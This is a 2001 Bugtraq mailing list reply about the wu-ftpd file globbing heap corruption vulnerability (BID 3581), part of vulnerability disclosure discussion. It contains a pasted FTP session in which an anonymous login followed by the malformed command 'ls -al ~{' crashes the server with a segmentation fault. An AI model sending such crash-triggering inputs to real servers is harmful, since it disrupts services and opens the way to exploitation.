Bugtraq mailing list archives
Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability
From: <goba () Leu Braila Astral Ro>
Date: Sun, 2 Dec 2001 18:07:34 +0200 (EET)
On Fri, 30 Nov 2001, Hasan Azam Diwan wrote:
Darwin's ftpd is not vulnerable... the "ls ~{" command returns a list of ~root.
[teste@XXX teste]$ ftp test.somehost.com Connected to test.somehost.com. 220 Test.somehost.com FTP server (Version wu-2.6.1-16.7x.1) ready. 530 Please login with USER and PASS. 530 Please login with USER and PASS. KERBEROS_V4 rejected as an authentication type Name (test:teste): ftp 331 Guest login ok, send your complete e-mail address as password. Password: 230-The response 'baubau' is not valid 230-Next time please use your e-mail address as your password 230- for example: joe () test somehost com 230 Guest login ok, access restrictions apply. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls ~{ 227 Entering Passive Mode (194,105,27,22,166,166) 550 Missing } ftp> ls -al ~{ Segmentation fault (core dumped) As you can see the problem still exist, even if updates are done. Goba
Current thread:
- Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability Hasan Azam Diwan (Dec 01)
- Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability Travis Siegel (Dec 02)
- Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability goba (Dec 02)
- Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability Morten Poulsen (Dec 03)
- Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability Jedi/Sector One (Dec 03)
- Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability Morten Poulsen (Dec 03)
- <Possible follow-ups>
- Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability Patrick Cantwell (Dec 05)